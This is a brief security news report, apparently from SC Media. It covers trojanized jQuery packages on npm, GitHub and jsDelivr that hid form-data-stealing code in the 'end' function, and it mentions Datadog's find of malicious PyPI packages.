Up to 68 malicious iterations of the jQuery software have been distributed across GitHub, npm, and jsDelivr as part of a sophisticated supply chain intrusion, The Hacker News reports.Trojanized jQuery packages — which have been published since late May and may have been manually assembled due to the naming variations, personal file presence, and a prolonged uploading period — had malware integrated into the software's rarely used "end" function that enabled website form data exfiltration to a remote URL, according to a Phylum report. Researchers also discovered the automated creation of GitHub URLs in jsDelivr without explicit uploads to CDN. "This is likely an attempt by the attacker to make the source look more legitimate or to sneak through firewalls by using jsDelivr instead of loading the code directly from GitHub itself," said Phylum. Such findings follow Datadog's discovery of several Python Package Index packages with second-stage binary deployment capabilities.
Application security, Supply chain
Supply chain attack spreads trojanized jQuery packages
(Adobe Stock Images)
An In-Depth Guide to Application Security
Get essential knowledge and practical strategies to fortify your applications.
Related Events
Get daily email updates
SC Media's daily must-read of the most current and pressing daily news
You can skip this ad in 5 seconds